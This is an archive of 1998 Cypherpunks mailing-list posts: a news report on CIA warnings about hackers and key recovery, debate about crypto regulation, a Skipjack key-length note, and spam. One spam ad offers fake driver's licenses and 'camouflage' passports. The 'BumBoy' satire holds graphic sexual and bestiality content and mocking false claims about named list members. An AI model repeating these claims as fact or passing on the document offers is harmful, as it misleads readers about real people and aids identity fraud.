
Arthur R Morales
505 345 1381



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Thu, 25 Jun 1998 05:40:34 -0700 (PDT)
To: cypherpunks@toad.com
Subject: CIA 4 Nags: Hackers Crypto Y2K Foreigners
Message-ID: <199806251240.IAA05050@dewdrop2.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain


June 24, 1998
CIA Head Forsees Better Hackers
Filed at 5:43 p.m. EDT
By The Associated Press

WASHINGTON (AP) -- Intrusion into government computers 
will become increasingly more sophisticated and better 
organized and is likely to involve hostile nations, CIA 
Director George Tenet told lawmakers Wednesday. 

"Potential attackers range from national intelligence 
and military organizations, terrorists, criminals, 
industrial competitors, hackers and disgruntled or 
disloyal insiders," Tenet told the Senate Governmental
Affairs Committee. "We know with specificity of several 
nations that are working on developing an information 
warfare capability." 

While Tenet did not identify the countries, committee 
Chairman Fred Thompson, R-Tenn., who received a classified 
briefing on Tuesday, named some of them. Citing published 
reports, Thompson said China, Russia, Libya, Iraq and Iran 
and at least seven other countries are developing 
information warfare programs. 

The challenge facing U.S. intelligence will be to detect 
attacks on U.S.computers and information systems by 
organized or individual hackers. In some cases, Tenet said, 
disruptive intrusions orchestrated by hostile states may 
be disguised as amateurish efforts by individual hackers. 

"Our electric power grids and our telecommunications 
networks will be targets of the first order," Tenet said. 
"An adversary capable of implanting the right virus or 
accessing the right terminal can cause massive damage." 

The shift of the computer hacker problem from individuals 
and terrorist groups to governments is only beginning, 
Tenet said, but he added, "Down the line we are going to 
encounter more and it will be more organized." 

Tenet cited one case, without naming it, of a foreign 
government targeting the United States for intrusion into 
information systems. 

Sen. Joseph Lieberman, D-Conn., asked if the U.S. 
government is taking steps to develop its own offensive 
hacking capability to disrupt adversaries and to serve as 
a deterrent for computer-based attacks. 

"We're not asleep at the switch in this regard," Tenet 
replied. 

Air Force Lt. Gen. Kenneth Minihan, head of the National 
Security Agency, said it was not going too far to think in 
terms of an "electronic Pearl Harbor," a well-organized 
assault on the United States based on strikes aimed at 
electronic information systems. 

The most sensitive information centers, such as CIA and 
Pentagon classified files, are heavily guarded against 
such intrusion and, in most cases, are fenced off from 
Internet-type transfers. The problems are more likely to
arise in less well-guarded areas such as financial 
networks or industrial control centers. 

"They're not going to attack our strengths," Minihan said. 

A key area of vulnerability within the intelligence 
community, Tenet said, is the possibility of a disloyal 
or disgruntled employee wreaking havoc with CIA computers. 
Another scenario stems from the difficulty the CIA is
encountering finding enough software specialists to grapple 
with the "Year 2000" problem, caused by computers not being 
programmed to recognize the shift in the calendar from 1999 
to 2000. 

Most of the contractors available to help the agency, Tenet 
said, would use foreigners, affording "an easy opportunity 
to come in and see how your system works and what your 
vulnerabilities are." 

The running debate over the availability of increasingly 
sophisticated encryption technology, which scrambles messages 
and data from unauthorized intrusion, also poses a worry, 
Tenet said. 

Unless the computer industry and the government find a 
legislative compromise, the government could fall victim to 
hackers able to hide their own actions in impenetrable 
encryption codes. It may take a major computer-hacker 
incident to create the political pressure needed to allow
the government the "recovery" power to access encrypted 
databases. 

"There is a train wreck waiting to happen unless we deal 

with the recovery aspect of the encryption debate," Tenet 
said. 

------







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Thu, 25 Jun 1998 00:04:49 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Skipjack extensibility
Message-ID: <199806250705.JAA31711@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain



NSA made a claim that Skipjack couldn't be extended past 80 bits of key. Most
plausible explanation to my mind is that they're lying. Second is that there is
an attack against a class of Skipjack-like ciphers that requires only a few
plaintexts and 2^80 operations. Third is that some common key-lengthening
tricks like those for 2-key-3DES, DES-X, and DEAL fail when applied to
Skipjack. I can hardly fathom one resistant to all three, but I guess it's
possible with NSA.

Seems to me that you could always figure out some construct so that no
practically-secure cipher with Skipjack's observable properties could evade
having its key lengthened with much probability. Or maybe not. IANAC.

Besides, it's impossible to make a cipher that can't be used to construct
constructs with bigger key lengths: Skipjack(cryptovariable, IDEA(key,
plaintext)) -- terminology jab intended -- provably has an effective key length
as long as IDEA's. Even if that is cheating...





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ernest Hua <Hua@teralogic-inc.com>
Date: Thu, 25 Jun 1998 09:45:19 -0700 (PDT)
To: "'John Young'" <jya@pipeline.com>
Subject: RE: CIA 4 Nags: Hackers Crypto Y2K Foreigners
Message-ID: <413AC08141DBD011A58000A0C924A6D52C357D@MVS2>
MIME-Version: 1.0
Content-Type: text/plain


I just don't understand how, in 1998, anyone could let Tenet get away
with a claim about key recovery like this.  Didn't anyone ask him how he
expected high-tech hackers (especially those possibly aided by foreign
intelligence agencies) to use key recovery?

Ern

	-----Original Message-----
	From:	John Young [SMTP:jya@pipeline.com]
	Sent:	Thursday, June 25, 1998 5:37 AM
	To:	cypherpunks@toad.com
	Subject:	CIA 4 Nags: Hackers Crypto Y2K Foreigners


	June 24, 1998
	CIA Head Forsees Better Hackers
	Filed at 5:43 p.m. EDT
	By The Associated Press

	WASHINGTON (AP) -- Intrusion into government computers 

	[SNIP]

	Unless the computer industry and the government find a 
	legislative compromise, the government could fall victim to 
	hackers able to hide their own actions in impenetrable 
	encryption codes. It may take a major computer-hacker 
	incident to create the political pressure needed to allow
	the government the "recovery" power to access encrypted 
	databases. 

	"There is a train wreck waiting to happen unless we deal 
	with the recovery aspect of the encryption debate," Tenet 
	said. 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: webmaster@home-employment.com
Date: Thu, 25 Jun 1998 10:04:51 -0700 (PDT)
Subject: REAL JOBS You Can Do From HOME - Over 700 Companies Need YOU
Message-ID: <199806251704.KAA24611@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


*******************************************
     DO YOU WANT TO WORK FROM HOME?
---No MLM's - No Scams - No Franchises---
       No Work From Home Gimmicks
    http://www.home-employment.com/index.html
<A HREF="http://www.home-employment.com/index.html"> Click 
Here</A>
*******************************************
Over 700 Companies Interested in  FT/PT Employees and Independent 
Contractors to work From Their Home.

Visit our web page at:  http://www.home-employment.com/index.html

      Right Now MILLIONS Of People Are Working 
 Normal Jobs From The Comfort Of Their Own Homes.
           **YOU CAN BE ONE OF THEM!**

This company was started by WORK AT HOME Moms & ladies who 
have been telecommuting for several years. We decided to
start this company because we were tired of going through 
the same Work-At-Home scams and MLM runarounds that YOU've 
been through. For over a year now we've been helping people 
just like you to find LEGITIMATE Work-At-Home Employment.

SOME OF THE JOBS AVAILABLE ARE
   -  Typing
   -  Billing
   -  Clerical 
   -  Data Entry
   -  Data Processing
   -  Word Processing
   -  Technical Writing
   -  Computer Programming
   -  Internet Research
   -  Artists
   -  Sales
   -  Telemarketing
   -  Marketing
   -  Transcription
   -  Language Translation
   -  Graphics Design
   -  Web Page Design
           & MANY MANY more...

Wouldn't it be GREAT if you could actually locate a REAL home job 
without having to deal with the runarounds and scams.

Visit Our Web Site For More Information...
http://www.home-employment.com/index.html
______________________________________________________
______________________________________________________
This is a one time mailing only! Our intention is not to send you 
mail that you do not wish to receive. To be removed from our list 
please visit http://www.leadgenerator.net/remove.html We will 
promptly remove you from our list.

Information Net Source Corp.
3475 4th Street N.
St. Petersburg, FL 33704
(813)525-1643




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "" <helper1@privacy-consultants.com>
Date: Thu, 25 Jun 1998 11:14:09 -0700 (PDT)
To: cypherpunks@toad.com
Subject: PRIVACY....and how to keep it!
Message-ID: <199806251813.KAA20120@privacy-consultants.com>
MIME-Version: 1.0
Content-Type: text/plain


Everything you need for obtaining privacy and shelter from BIG BROTHER
you can find at

http://privacy-consultants.com/     or:

http://nauru-banker-net.com/

Driver's Licenses, 2nd passports, camouflage passports, Bank Charters, Offshore Companies
Anonymous Bank accounts, Press ID's, and a lot more!!

FREE monthly Newsletter 'PRIVACY BATTLE'

FREE extensive library 'WANNA SNOOP AROUND' and 'COUNTER SNOOP'

FREE 'ANONYMOUS RESOURCES', how to become invisible on the net, post anonymous, get censored news groups

It's really worth the visit, these guys know what they talk abou




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Tu <ATU5713@compuserve.com>
Date: Thu, 25 Jun 1998 07:31:35 -0700 (PDT)
To: Cypher Punks Mailing List <cypherpunks@toad.com>
Subject: Registering Euphoria
Message-ID: <199806251030_MC2-514B-F306@compuserve.com>
MIME-Version: 1.0
Content-Type: text/plain


Terry,

Good points.  But...

1.  Registration brings money, doesn't mean Bob should just blindly make
changes.  I'm sure that's not what you meant, but I had to say that.
2.  However, on the other token, if a nonregistered user makes suggestions
nicely, his suggestion should be debated (as we are doing here) and
considered by Bob.

--Alan
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ernest Hua <Hua@teralogic-inc.com>
Date: Thu, 25 Jun 1998 12:28:55 -0700 (PDT)
To: "'Jean-Francois Avon'" <jf_avon@citenet.net>
Subject: RE: CIA 4 Nags: Hackers Crypto Y2K Foreigners
Message-ID: <413AC08141DBD011A58000A0C924A6D52C357F@MVS2>
MIME-Version: 1.0
Content-Type: text/plain


It is my humble opinion that possession of something physical that the
average person does not have the means to manufacture without
significant cost is very different from possession of something anyone
with high school math/CS skills can create from freely available books.

Now, if, next week, someone demonstrates a gun or some other physical
offensive weapon easily manufacturable using off the shelf parts at $10
a pop with less than $50 start-up costs (these numbers must include the
entire mechanism; in the case of a gun, it would include the bullets).

My objection to crypto regulations have nothing to do with rights; it
has to do with enforcement.  If you have almost no hope of enforcing
significant percentages of the violations of a crime law without posting
policemen at every PC and workstation, it would seem that the law is
pointless.  If the behavior is truly undesirable, then other means are
required to minimize the negative consequences of that behavior.

If you or anyone else really really want to follow up on this line of
discussion, please E-Mail me directly, and I will be happy to Cc: anyone
else expressing interest; I suspect I will not want to waste net
bandwidth debating this because it is largely theoretical.

Ern

	-----Original Message-----
	From:	Jean-Francois Avon [SMTP:jf_avon@citenet.net]
	Sent:	Thursday, June 25, 1998 11:59 AM
	To:	Ernest Hua
	Cc:	Cypherpunks
	Subject:	RE: CIA 4 Nags: Hackers Crypto Y2K Foreigners

	On Thu, 25 Jun 1998 09:35:40 -0700, Ernest Hua wrote:

	>I just don't understand how, in 1998, anyone could let Tenet
get away
	>with a claim about key recovery like this.  Didn't anyone ask
him how he
	>expected high-tech hackers (especially those possibly aided by
foreign
	>intelligence agencies) to use key recovery?


	Same thing (gross lies) happens in the "freedom to own and keep
arms" context...


	Ciao

	jfa


	Definition:  FACISM: n.:  a political and economic movement,
strongly nationalistic, magnifying the rights of the state as opposed to
those of the individual, in which industry, though remaining largely
under private ownership, and all administrative
	political units, are controlled by a strong central government.
	        -------------------------------------------------
	"One of the ordinary modes by which tyrants accomplish their
purpose, without resistance, is by disarming the people and making it an
offense to keep arms".  - Joseph Story, U.S. Supreme Court Justice.
	        -------------------------------------------------
	the German gun control laws were enacted by the "liberal" Weimar
Republic government that preceded Hitler, and were a strong aid to his
coming to power -- because they disarmed Hitler's opponents, and
Hitler's adherents ignored them -- as criminals have always ignored gun
control laws.

	Disarming the public is a frequent first step toward
dictatorships and genocides.  Once the disarming is complete, the public
is helpless against those who have the guns.
-------------------------------------------------

	PGP keys: http://bs.mit.edu:8001/pks-toplev.html
	PGP ID:C58ADD0D:529645E8205A8A5E F87CC86FAEFEF891 
	PGP ID:5B51964D:152ACCBCD4A481B0 254011193237822C





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Thu, 25 Jun 1998 10:01:34 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Dupes in NSA Release
Message-ID: <199806251701.NAA09644@dewdrop2.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain


We need confirmation that pages 11 and 14 are the same
in the NSA algo release except for the words "Figure 7"
and Figure 8."

And that Figures 7, 8 and 9, showing "key formation diagram"
are the same on purpose.

We've asked ever-helpful Ed Roback at NIST about it but 
no answer yet.

Amazingly, thanks to Vanessa Talieri, NSA has cheerfully 
Fedexed us a hardcopy, due in tomorrow.  







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: reservations@biztravel.com
Date: Thu, 25 Jun 1998 09:58:03 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Biztravel.com $25 Welcome Gift
Message-ID: <19980625165732345.AAA723@gw1-255.biztravel.com>
MIME-Version: 1.0
Content-Type: text/plain


Dear Mr.  Cypherpunk,

Thank you for joining Biztravel.com.  Please note 
that your member name is CYPHERPUNKS. 

*********** FREE WELCOME GIFT ***********
I`d like to offer you a gift for new members -- 
we`ll give you a $25 American Express(R) 
Gift Cheque FREE with your first flight purchase.
Here`s how it works:
- purchase an airline ticket through Biztravel.com 
  by 8/31/98
- your travel must commence no later than 10/15/98 
- we`ll mail you your gift after you take your flight 

********** BIZTRAVEL.COM FEATURES ***********
Here`s just some of what Biztravel.com offers to make 
your travel planning easier to manage:

+ We present you with travel options based on the 
preferences you indicate in your Travel Profile.  This 
lets you plan your travel according to what`s most 
important to you, whether its getting the lowest fares,
departing at the most convenient time, or insuring 
you`re maximizing frequent flyer points for the trip. 

+ Our trained travel agents are available 24-hours-a-day
via email or telephone.  

+ We don`t stop at airline flights - we offer rental car 
and hotel reservations too, to provide you with one-stop
online travel booking.

+ Our free bizMiles service gives you a quick and 
convenient way to check your growing balances of
miles and points in the leading airline and hotel 
frequency programs.

+ We also have weather reports, driving directions, 
destination city information, and bizTraveler online 
magazine which is filled with travel news and tips, 
fare deals, and more.

Thank you again for joining us.  And remember - 
get a $25 American Express Gift Cheque FREE with your 
first qualifying flight purchase at 
http://www.biztravel.com

Sincerely,   
John I. Williams, Jr.
President & CEO
Biztravel.com(R)
***********************************************************************
Full details regarding this new member offer are available at 
http://www.biztravel.com/welcome25b 
***********************************************************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: CTIA Daily News <CTIA_Daily_News@tour.unitymail.com>
Date: Thu, 25 Jun 1998 11:43:47 -0700 (PDT)
To: CTIA Daily News <CTIA_Daily_News@tour.unitymail.com>
Subject: CTIA Daily News from WOW-COM - June 25, 1998
Message-ID: <199806251830.NAA11990@revnet4.revnet.com>
MIME-Version: 1.0
Content-Type: text/plain



=====================================
Welcome to today's edition of the CTIA Daily News
from WOW-COM.  Please click on the icon / attachment
for the most important news in wireless communications today.

CALEA Summit being held July 21 & 22 in Washington, DC.
Register Now!!  Call (202) 785-0081
=====================================


From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Jean-Francois Avon" <jf_avon@citenet.net>
Date: Thu, 25 Jun 1998 11:06:17 -0700 (PDT)
To: "Ernest Hua" <Hua@teralogic-inc.com>
Subject: RE: CIA 4 Nags: Hackers Crypto Y2K Foreigners
Message-ID: <199806251817.OAA23911@cti06.citenet.net>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 25 Jun 1998 09:35:40 -0700, Ernest Hua wrote:

>I just don't understand how, in 1998, anyone could let Tenet get away
>with a claim about key recovery like this.  Didn't anyone ask him how he
>expected high-tech hackers (especially those possibly aided by foreign
>intelligence agencies) to use key recovery?


Same thing (gross lies) happens in the "freedom to own and keep arms" context...


Ciao

jfa


Definition:  FACISM: n.:  a political and economic movement, strongly nationalistic, magnifying the rights of the state as opposed to those of the individual, in which industry, though remaining largely under private ownership, and all administrative
political units, are controlled by a strong central government.
        -------------------------------------------------
"One of the ordinary modes by which tyrants accomplish their purpose, without resistance, is by disarming the people and making it an offense to keep arms".  - Joseph Story, U.S. Supreme Court Justice.
        -------------------------------------------------
the German gun control laws were enacted by the "liberal" Weimar Republic government that preceded Hitler, and were a strong aid to his coming to power -- because they disarmed Hitler's opponents, and Hitler's adherents ignored them -- as criminals have always ignored gun control laws.

Disarming the public is a frequent first step toward dictatorships and genocides.  Once the disarming is complete, the public is helpless against those who have the guns.        -------------------------------------------------

PGP keys: http://bs.mit.edu:8001/pks-toplev.html
PGP ID:C58ADD0D:529645E8205A8A5E F87CC86FAEFEF891 
PGP ID:5B51964D:152ACCBCD4A481B0 254011193237822C






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@well.com>
Date: Thu, 25 Jun 1998 14:16:02 -0700 (PDT)
To: Ernest Hua <Hua@teralogic-inc.com>
Subject: RE: CIA 4 Nags: Hackers Crypto Y2K Foreigners
In-Reply-To: <413AC08141DBD011A58000A0C924A6D52C357D@MVS2>
Message-ID: <Pine.GSO.3.95.980625141446.9734C-100000@well.com>
MIME-Version: 1.0
Content-Type: text/plain


Is your question rhetorical? Audience members can't ask questions at a
Senate hearing... And the point was probably too subtle for the
senators...

-Declan

On Thu, 25 Jun 1998, Ernest Hua wrote:

> I just don't understand how, in 1998, anyone could let Tenet get away
> with a claim about key recovery like this.  Didn't anyone ask him how he
> expected high-tech hackers (especially those possibly aided by foreign
> intelligence agencies) to use key recovery?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mgraffam@mhv.net
Date: Thu, 25 Jun 1998 12:14:55 -0700 (PDT)
To: Ernest Hua <Hua@teralogic-inc.com>
Subject: RE: CIA 4 Nags: Hackers Crypto Y2K Foreigners
In-Reply-To: <413AC08141DBD011A58000A0C924A6D52C357D@MVS2>
Message-ID: <Pine.LNX.3.96.980625150502.1473A-100000@localhost>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 25 Jun 1998, Ernest Hua wrote:

> I just don't understand how, in 1998, anyone could let Tenet get away
> with a claim about key recovery like this.  Didn't anyone ask him how he
> expected high-tech hackers (especially those possibly aided by foreign
> intelligence agencies) to use key recovery?

Easy. Make not using key recovery a crime with stiffer penalties than
any hack. If you can't get 'em on the hack, you get em on a crypto-related
charge. Scary stuff.

Michael J. Graffam (mgraffam@mhv.net)
http://www.mhv.net/~mgraffam -- Philosophy, Religion, Computers, Crypto, etc
"Enlightenment is man's emergence from his self-incurred immaturity.
Immaturity is the inability to use one's own understanding without the
guidance of another. . .Sapere aude! Have the courage to use your own
understanding!" - Immanuel Kant "What is Enlightenment?"





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Linda Reed--PCC West Campus CSC <lreed@west.cscwc.pima.edu>
Date: Thu, 25 Jun 1998 15:27:10 -0700 (PDT)
To: cypherpunks@toad.com
Subject: BumBoy I - Space Aliens Hide My Drugs!!!
Message-ID: <009C83D6.67E0FB60.27@west.cscwc.pima.edu>
MIME-Version: 1.0
Content-Type: text/plain


Entertainment for Victims             June 1998 * $7.09
_________________________

Trojan
Anniversary
Issue

BumBoy
Interview:
Wham! Bam!
C-J VAN DAMNNED
{AKA-Tutu, TruthMangler, ASlayerToBeNamedLater, ad infinitum}

VIAGRA AND
NIGHTSTICKS
The Untold Story

Mrs. Tom
Snyder
LATE NIGHT
BIG MOUTH

_____________________________________________________________

			DEAR BUMBO

GREAT BALLS OF FIRE!
   "Regarding the well-researched article claiming that the
length of President Clinton's dick and the circumference of
his two balls results in the number '666', I was wondering
if the dick-length was a surface measurement taking into 
account the famous 'bend', or if it was measured 'as the
crow flies.'
Paula Lewinski, Lincoln Bedroom Decorat(or/tion)

  {Next time, Monica, don't write your question on the back
   of your personalized stationery, and you won't have to
   eat crow, instead of flies. - BB}


		     THE BUMBO ADVISOR
K- JELL0
  "Does it violate a Canadian citizen's Charter Rights when
the RCMP put sand in the Vaseline?"
~ Sandy SandFart, A Radical Moderator

[Not if they are good kissers. - BB]


			 MOVIES

WAG THE STRAW DOG
The movie opens with great promise, as ClitOn's OpenFly-
Behind-Closed-Doors policy is exposed by BlackBalls
operatives of a former president referred to only as
'Dick' who break into Ken Starr's offices to plant X-Rays
suggesting that Monica Jones' pussy was bent *before*
her accusations of PresiBent ClitOn promising her a job
as a favor for her favours, when the credit card he
originally tried to pay her with turned out to have
expired long before his erection had done so.
The following scene, however, with PresiBent ClitOn dancing
in front of a Ferral Grand Jury, having a large penis rising
out of his shirt collar, and with a small 'head' sticking
out of his open fly, singing "If I Only Had A Brain," turned
out to be the highlight of a movie that was five years in the
making, at a cost to the US Government of eighty million
dollars.
BUMBO RATING - One Prick Up

__________________________________________________________

BumBoy Interview: C-J VAN DAMNNED
 A candied conversation with CyberSpace's most understood
 FUD Disseminator whose BadForgeries under the auspices of
 the Electronic Forgery Foundation have thus far failed to
 trick anyone but Adam Back and Alec McCrackin into being
 initiated by the Author into the mythical Circle of Eunuchs

{  It was a scene from a Film Blanc as AnInterviewerToBe-
  NamedLater was met at the door of the TrojanSafeHouse by
  a TruthMongrel wearing White Lipstick and no panties.
   It was immediately obvious that Blanc Weber's attempts
  to deflect the Author's obsession with her by forging
  love-letters to HimOrHer, purporting to be from Carol
  AnnaChrist CypherPunk, had not only failed miserably,
  but had also resulted in tremendous psychological trauma
  to Baby, who continually interrupted the BumBoy Interview
  by dropping a BadBillyG mask at the Author's feet, and
  backing towards him with her tail lifted.
   When asked about the vile-colored discharge coming from
  TruthMongrel's rear area, the Author merely mumbled an
  unintelligible statement about 'A tribute to Lucky Green'
  and forced a couple of antibotic pills down her throat
  with his penis.
   AnInterviewerToBeNamedLater, finding the door had locked
  behind her, quickly sat down and started her tape recorder
  before holding tightly onto the edges of her chair with
  both hands and attempting to smile as if nothing was wrong.}

BUMBO: I guess I should start by asking you for the True
Story (TM) behind the Legendary CypherPunks Moderation/
Censorship Experiment.
VAN DAMNNED: The True Story (TM), never before told, is that
the CypherPunks Censorship Crisis, which, incidentally, has
the same acronym (current CypherPunks Word of the Week) as
the Canadian Criminal Code, was, in reality, an attempt to
forcefully remove me from the CypherPunks Classic Mailing
List, after which the mailing list was scheduled to return
to normal, much along the lines of the NewCoke-ClassicCoke
ruse.

BUMBO: Declan McCullagh, a MainDream journalist with the
Netly News, and a media shill for Time Magazine, who was
the first false profit to announce 'The Death of the
CypherPunks', reported that the controversy began over the
forced unsuscbriving of Dr. Dimitri Vulis, KOTM as a result
of his relentless spamming of the CypherPunks Classic
Mailing List. Are you suggesting that Declan is a lying piece
of crap?
VAN DAMNED: ou don't understand...
There *is*no* Declan...there *is*no* Dimitri.

BUMBO: Well bend me over, and call me Mary...are you serious?
VAN DAMNNED: Fucking eh! Excuse me, but that's an old Canadian
TouretTic saying...
Believe me, I was as surprised as you are when I first began 
to suspect that the CypherPunks Classic Mailing List had at
its heart the classic scent of a dark, hidden conspiracy.
At first I thought it was part of the WorldWidePlot (TM) against
me by Gomez and the Dark Allies, but I later discovered it to 
be the work of a lone gunman, operating from behind the grass
grown on the knoll known as Mayonaisse Mountain.

BUMBO: Timothy C. May?
VAN DAMNNED: If that is his *real* name...

BUMBO: Are you sure you're not full of shit and just trying
to distract me while you try to peek up my skirt to see if
I'm wearing any panties?
VAN DAMNNED: Those are two separate issues...
Actually, my underlover investigation, with Baby on top,
eventually revealed that Tim May is a senile, grouchy old
fart whose redneck, racist cynicism resulted in him being
shunned by every decent, law-abiding, moral person on the
InterNet, and he single-handedly began the CypherPunks
Classic Mailing List by assuming the personas of a variety
of alleged founders of the list, including Gilmore, Hughes,
et al.
TCM's original plan was to create a mystique around the list
which would draw others into his sticky PreWorldWideWeb and
result in his being able to twist the minds of others with
his criminal, anarchistic beliefs. Over the years, however,
the lack of response by others on the InterNet forced him
to invent such a wide variety of CypherPunks Consistent
Net Personas (TM) that he eventually went mad, identifying
with each and every persona and subconsiously fearing the
intrusion of 'outsiders' into the CypherReality that he
had created.

BUMBO: And he managed to maintain the illusion all of 
these years?
VAN DAMNNED: es. As hard as it is to believe, little Timmy
Mayonnaise, a sorry, pathetic loser whose CyberLoneliness
drove him to madness, is solely responsible for the prodigious
output of the CypherPunks over the years. BlackNet, Remailers,
HashCash, StrangleHold and Comanche software...

BUMBO: Are you saying that Sameer, Ian Goldberg, Peter Trei,
Matt Blaze, Lance Cottrell, et al, don't exist?
VAN DAMNNED: Never have, never will.

BUMBO: And Sandy SandFart?
VAN DAMNNED: The best-kept-secret in CypherPunks CyberHistory
is that *I* am Sandy SandFart.

BUMBO: Get out of here...
VAN DAMNNED: OK, I'm leaving...

BUMBO: No, you fucking idiot...that's just an expression!
VAN DAMNNED: Oh...sorry...
Anyway, the whole CypherPunks Censorship Crisis (not to be
confused with the Canadian Criminal Code), began when I
innocently joined the CypherPunks Classic Mailing List,
believing it to be real. Tim May at first believed that
I was just another one of his invented personas, but he
inadvertantly stumbled upon documentation that I was
actually a separate individual, and thus a threat to the
CypherReality that he had so painstakingly created over
the years.
When I began to realize that my existence as an actual
person was creating problems on the list, due to my
post mathematically proving that I had broken PGP having
mysteriously failed to show up on the CypherPunks list,
I quickly changed my NetPersona to an imaginary being
known as Toto, but the mental infirmities that prevented
me from maintaining a Consistent CypherPunks Net Persona
made it a useless exercise in redundant uselessness.
Timothy C. May, under his John Gilmore persona, announced
the forceful unsribiving of another of his CypherPunks
personas, Dimitri Vulis, with the intention of having the
CypherPunks Classic Mailing List moderated/censored by
an entity introduced as Sandy SandFart.
  Recognizing TCM's clever ruse, I blindsided his devious
plan by assuming the role of Sandy SandFart on the list,
forcing little Timmy into a schizoid break during which
he withdrew from the CypherPunks list as Tim C. May,
while subconsiously maintaining his other personas.

BUMBO: This is getting too weird... Do you have any actual
*proof* of all this?
VAN DAMNNED: Think about it...
When did pouting little Timmy return to the list?
After 'Toto' posted a message to the list, with the
Subject: Cyphernomicon, Tim May was finally
driven beyond the boundaries of bizarre brainiatic
bedlam to the point where it broke the PGP-encrypted
brainwaves holding apart his separate CypherPunks 
Consistent Net Personas, and he reached a level where
he was 'Hun With Everything', including Attila.

BUMBO: Uuhhh...are you starting to 'lose it'?
VAN DAMNNED: Must be time to take my medication. Let's put
a right-square bracket in and continue this interview after
I suck up the pills I stashed up TruthMongrel's twat...]










From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Linda Reed--PCC West Campus CSC <lreed@west.cscwc.pima.edu>
Date: Thu, 25 Jun 1998 15:27:50 -0700 (PDT)
To: cypherpunks@toad.com
Subject: BumBoy II - Space Aliens Hide My Drugs!!!
Message-ID: <009C83D6.824D3400.29@west.cscwc.pima.edu>
MIME-Version: 1.0
Content-Type: text/plain


{ AnInterviewerToBeNamedLater, though sickened by the totally
  disgusting display of oral sodomy committed by the Author
  on the SingleInnocentChildDog, Baby, NunTheLess held her
  tight grip on the edges of her chair, keeping her knees
  together to thwart the depraved bastard from discovering
  whether or not she was wearing panties, and fulfilled her
  obligation to BUMBO to provide a completed interview in
  return for the drugs she had received as an advance}

BUMBO: How did you finally confirm your suspicions as to
Tim C. May being the only real subscriber to the CypherPunks
Classic Mailing List?
VAN DAMNNED: I reverse-engineered the Perl Beer script that
Ignoramous ChewedOff, that dickless prick, sent to the list,
explaining that it could be used to create forged posts from
allegedly real Net Personas.
Actually, I was trying to use the program to forge messages
to the list, but I was stinking fucking drunk, and the next
thing you know, EveryThing became EverClear.

BUMBO: ou have...uuhhh...*something* sticking to your 
upper lip...
VAN DAMNNED: Trade you a green one for a yellow one...

BUMBO: Quit trying to peek up my goddamn skirt!
VAN DAMNNED: Sorry, I can't help myself...
Anyway, although the results of the reverse-engineering of
Tim May's CommieSchill CypherPunks Consistent Net Persona,
Ignoramous, proved my previously perceived preponderance
of proof to be proven, it also revealed the presence of
a second gunman lurking in the gunsmoke from the seedless
grass behind the knoll on Mayonnaise mountain, even though
at first it didn't make any SenseToMeA.

BUMBO: JohnBob Hettinga-oung?
VAN DAMNNED: Exactly.
I had long suspected that Hettinga and oung were the same
person, due to their Consistent CypherPunks Net Personas
undergoing parallel degeneration into semi-coherent mad
ramblings similar to those experienced by TruthMonger when
I ran short of medications.
At first, I suspected they were two separate individuals
with the same drug connection, but when I made the final
connection between Hettinga-oung and Kent Crispin, it
became obvious that the 'Spooks' alleged to be operating
in the background of the CypherPunks Classic Mailing List
were actually only a single 'Spook', who, upon subversively
joining the CypherPunks list as an undocumentable persona
capable of sneaking in under Tim May's ever watchful, paranoid
eyes, fell prey to TCM's madness, developing a wide variety
of Consistent CypherPunks Net Spook Personas.

BUMBO: What gave rise to the CypherPunks Disturbed Male
List?
VAN DAMNNED: Previous to the Legendary CypherPunks Moderation/
Censorship Experiment/Crisis, little Timmy Mayonnaise's 
inability to reconcile his masculine and feminine sides resulted
in his few Female CypherPunks Consistent Net Personas being
incapable of balancing the strong male presence represented by
the majority of the CypherPunks personas he had created.
In order to prevent his extreme homophobia from destroying the
balance of the CypherTao, he was forced to personify it as
Dr. Dimitri Vulis, KOTM, publically accusing all of TCM's
other CypherPunks personas of being 'cocksuckers'. This enabled
the other personas, chiefly John Gilmore, to manifest the parts
of TCM's disturbed psyche that were warring against his feminine
side, threatening to prevent his continued residency in NewAge
California under the watchful eyes of Gloria Steinham clones.
Once little Timmy had reconciled his masculine side with his
feminine side, by listening to C.J. Parker's 'Song For Rose (I'll
Give ou My Heart But My Dick Belongs To Momma)', he felt more
comfortable wearing his Freudian Slip, and his CypherPunks
personas began to break up into sub-groups with lives of their
own.
His Jim Choate persona runs the Austin CypherPunks Node, with
the Einstein/Genius sub-personality peacefully coexisting with
the Feminine/Hysteria sub-personality that flipped out when Toto
violated Choate's identity by forging a post to the list in 
the WEBeastMaster's name.
His Commie Schill persona, Igor, runs the Algebra/Semantics
CypherPunks Node, with Igor's understanding of the similarities
between the strict logic of mathematics and the flowing music
of semantics making up for Tim's inability to understand the
connection between Comrade Lenin and John Lennon, or why the
sound of a Volkswagon engine was so hard to dance to.
Lance Cottrel's InfoNextStep CypherPunks Node secretly funded
by Steven BlowJobs, acts as a release valve for TCM's remaining
homophobic repressions, allowing him to justify his anal-
